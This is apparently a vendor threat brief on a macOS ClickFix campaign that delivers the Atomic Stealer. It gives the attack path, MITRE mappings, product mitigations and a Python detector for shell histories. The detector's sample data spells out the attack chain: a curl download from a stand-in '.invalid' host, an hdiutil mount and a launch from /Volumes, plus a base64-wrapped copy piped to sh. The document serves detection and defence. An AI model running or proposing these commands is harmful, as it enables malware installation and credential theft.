Executive Summary
In June 2026, a new macOS ClickFix campaign emerged that uses Terminal commands to silently download, mount, and execute info-stealing malware from a malicious disk image (DMG). The payload is the Atomic macOS Stealer (AMOS), which exfiltrates browser credentials, cryptocurrency wallet data, Keychain contents, messaging app data, and user documents. The campaign begins with a fake CAPTCHA page instructing the user to open Terminal and paste a command; because the DMG is mounted and the binary launched from the shell rather than by double-clicking, the user never sees the Gatekeeper warning that would normally appear for an unsigned or unnotarized app. This is an evolution of ClickFix: the social-engineering lure is the same, but the pasted command now carries the whole infection chain, which improves both stealth and reliability for the attacker.
The significance of this incident lies in the increasing sophistication of social engineering attacks targeting macOS users. By leveraging trusted system utilities and deceptive prompts, attackers can bypass traditional security measures and user vigilance. This trend underscores the need for enhanced user education, robust endpoint protection, and continuous monitoring to detect and mitigate such evolving threats.
Why This Matters Now
The emergence of this sophisticated ClickFix campaign highlights the evolving tactics of cybercriminals targeting macOS users. As attackers refine their methods to exploit user trust and system functionalities, it is imperative for organizations and individuals to stay vigilant, update security protocols, and educate users on recognizing and avoiding such deceptive techniques.
Attack Path Analysis
The attack begins with social engineering: a fake CAPTCHA page tells the user to open Terminal and paste a command, which downloads a DMG, mounts it and launches the Atomic macOS Stealer (AMOS) from the mounted volume, sidestepping the Gatekeeper prompt a double-click would trigger. AMOS then runs with the user's own privileges; it needs neither a vulnerability nor a privilege-escalation exploit, because the data it targets (browser profiles, cryptocurrency wallet files, messaging app data, user documents) is already readable by that user, and Keychain contents are typically obtained by prompting the user for their login password through a forged dialog, a long-standing AMOS behaviour. The malware establishes a command and control channel to the attacker's server and exfiltrates the collected data over it. Nothing in the chain is lateral movement in the network sense; the follow-on risk is the attacker replaying the stolen credentials, tokens and session cookies against the victim's accounts and the organisation's services. The impact is the compromise of sensitive user data and potential financial loss.
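A detector for the chain described above, added here as an example and not code from the reporting cited below or from AMOS itself: it scores a shell-history or process command line by the three stages the campaign relies on (a download, an `hdiutil` mount, and execution from `/Volumes`) and unwraps the `echo <b64> | base64 -d | sh` wrapper that ClickFix lures commonly hide behind. The base64-wrapper handling is an assumption about how such lures are obfuscated, not a detail this page reports; the sample history lines and the `.invalid` hostnames are constructed for the example.

```python
"""Flag Terminal command lines that match the ClickFix DMG chain:
download -> hdiutil attach -> launch from /Volumes (optionally base64-wrapped).
Sample data below is constructed; nothing here is the campaign's real command."""
import base64
import re

# One regex per stage of the chain, evaluated over a single command line.
DOWNLOAD = re.compile(r"\b(?:curl|wget)\b")
MOUNT_DMG = re.compile(r"\bhdiutil\s+(?:attach|mount)\b")
EXECUTE = re.compile(
    r"\bopen\s+(?:-a\s+)?['\"]?/Volumes/"   # launch an app from the mounted image
    r"|\bchmod\s+\+x\b"                     # mark a dropped binary executable
    r"|\bxattr\s+-[dcr]+\s+\S*quarantine"   # strip the quarantine attribute
)
# Assumed obfuscation wrapper: echo <base64> | base64 -d | sh (macOS base64 takes -d, -D, --decode)
B64_WRAPPER = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)\s*\|\s*(?:sh|bash|zsh)\b"
)
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY lines look like ': <ts>:<elapsed>;cmd'


def strip_zsh_prefix(line: str) -> str:
    """Return the bare command from a zsh history line (plain lines pass through)."""
    return ZSH_PREFIX.sub("", line.rstrip("\n"))


def unwrap_base64(cmd: str) -> str:
    """If cmd is an echo|base64|sh wrapper, return the decoded inner command; else cmd unchanged."""
    m = B64_WRAPPER.search(cmd)
    if not m:
        return cmd
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # not valid base64 after all; treat the line as opaque
        return cmd


def stages_seen(cmd: str) -> set:
    """Return the set of chain stages present in cmd (after unwrapping)."""
    decoded = unwrap_base64(cmd)
    stages = set()
    if decoded != cmd:
        stages.add("base64_wrapped")
    if DOWNLOAD.search(decoded):
        stages.add("download")
    if MOUNT_DMG.search(decoded):
        stages.add("mount_dmg")
    if EXECUTE.search(decoded):
        stages.add("execute")
    return stages


def is_clickfix_dmg_chain(stages: set) -> bool:
    """All three stages on one line is the lure's signature; any one alone is routine admin work."""
    return {"download", "mount_dmg", "execute"} <= stages


def scan_history(lines):
    """Return [(line_index, sorted_stages)] for every line that matches the full chain."""
    hits = []
    for idx, raw in enumerate(lines):
        stages = stages_seen(strip_zsh_prefix(raw))
        if is_clickfix_dmg_chain(stages):
            hits.append((idx, sorted(stages)))
    return hits


# Constructed samples: hostnames use the reserved .invalid TLD and never resolve.
CLICKFIX_PLAIN = (
    "curl -fsSL https://captcha-check.invalid/verify.dmg -o /tmp/verify.dmg"
    " && hdiutil attach -nobrowse -quiet /tmp/verify.dmg"
    " && open /Volumes/Verify/Verify.app"
)
CLICKFIX_WRAPPED = "echo " + base64.b64encode(CLICKFIX_PLAIN.encode()).decode() + " | base64 -d | sh"
SAMPLE_HISTORY = [
    ": 1700000000:0;brew install wget",                      # benign: only the download token
    ": 1700000010:0;hdiutil attach ~/Downloads/Docker.dmg",  # benign: manual mount of a known DMG
    ": 1700000020:0;" + CLICKFIX_PLAIN,
    ": 1700000030:0;" + CLICKFIX_WRAPPED,
]

if __name__ == "__main__":
    for idx, stages in scan_history(SAMPLE_HISTORY):
        print(f"history line {idx}: ClickFix DMG chain, stages={stages}")
```

Run it over each user's `~/.zsh_history` for a retrospective sweep, or feed it process-creation command lines from your EDR or the unified log for live detection, since shell history is per user and trivially disabled. Tune `EXECUTE` to the launch idioms you see in your own environment, and do not paste the sample commands into a real Terminal.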
Kill Chain Progression
Initial Compromise
Description
Users were deceived into executing malicious commands in the macOS Terminal, leading to the download and execution of the AMOS malware.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste (T1204.004)
Command and Scripting Interpreter: Unix Shell (T1059.004)
Phishing: Spearphishing Link (T1566.002)
Application Layer Protocol: Web Protocols (T1071.001)
File and Directory Discovery (T1083)
Credentials from Password Stores: Keychain (T1555.001)
Screen Capture (T1113)
Exfiltration Over C2 Channel (T1041)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Security vulnerabilities are identified and addressed; system components are protected from known vulnerabilities
Control ID: 6.3 (6.3.3)
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – User Training and Awareness
Control ID: Identity pillar
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of this campaign, including operational, regulatory, and cloud security risks.
Financial Services
macOS ClickFix infostealer targeting cryptocurrency wallets, browser credentials, and payment data poses severe risk to financial institutions and client assets.
Information Technology/IT
IT sector faces elevated risk from Terminal-based social engineering attacks exploiting privileged access to steal credentials and compromise development environments.
Computer Software/Engineering
Software companies vulnerable to AMOS stealer targeting browser data, authentication tokens, and development credentials through deceptive CAPTCHA verification techniques.
Cryptocurrencies
Cryptocurrency sector severely impacted by targeted wallet theft including Exodus, Electrum, and malicious replacement of Ledger Live and Trezor Suite applications.
Sources
- New macOS ClickFix attack silently mounts DMGs to push infostealer (BleepingComputer): https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/ (Verified)
- Why AMOS matters: The macOS malware stealing data at scale (Sophos): https://www.sophos.com/en-us/blog/why-amos-matters-the-macos-malware-stealing-data-at-scale (Verified)
- Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings (Infosecurity Magazine): https://www.infosecurity-magazine.com/news/atomic-stealer-macos-clickfix/ (Verified)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is relevant to this incident as a network-layer control. It cannot stop a user from pasting a command into Terminal on their own Mac, but for the networks and workloads it governs it constrains where the malware, and anyone replaying the stolen credentials, can connect, through segmentation and controlled egress.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Aviatrix CNSF does not prevent the initial execution of the pasted command. Where endpoint or workload traffic transits an Aviatrix-controlled network, it can block or alert on connections to the attacker's download and command and control hosts, cutting off payload retrieval and the exfiltration channel.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation does not limit what the stealer reads on the infected Mac, since that data is local and already accessible to the user. Its value is in limiting what the harvested credentials, tokens and session cookies can reach afterwards, by restricting which workloads a given identity or network segment is allowed to connect to.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security constrains follow-on movement between cloud workloads if the attacker uses the harvested credentials to reach internal services, so a single compromised account does not translate into reach across the environment.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control surfaces unexpected outbound connections from governed networks, including traffic to newly seen domains, which is how a command and control channel from a workload or a routed endpoint would be spotted and then blocked.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement with a default-deny, allow-listed outbound policy blocks exfiltration to attacker infrastructure from governed networks. It does not cover a laptop on a home or coffee-shop network whose traffic never traverses the fabric; endpoint controls are needed there.
While Aviatrix CNSF does not prevent the initial compromise, it limits the blast radius: stolen credentials are worth less to the attacker when the network they could unlock enforces segmentation and egress control.
Impact at a Glance
Affected Business Functions
- User Authentication
- Data Security
- System Integrity
Estimated downtime: N/A
Estimated loss: N/A
Potential exposure of user credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation so that credentials, tokens and session cookies stolen from one endpoint cannot be replayed against every workload in the environment.
- Deploy Egress Security & Policy Enforcement to allow-list outbound traffic from governed networks, blocking payload downloads and data exfiltration to attacker infrastructure.
- Use Threat Detection & Anomaly Response to alert on a Terminal session chaining a download with an hdiutil mount and a launch from /Volumes, the signature of this lure, and on unexpected outbound connections that follow it.
- Enforce Multicloud Visibility & Control to maintain comprehensive oversight of network activity across all platforms.
- Educate users that no CAPTCHA or "verify you are human" page ever requires opening Terminal, and that commands copied from a web page must never be pasted into it; treat any such instruction as an attack.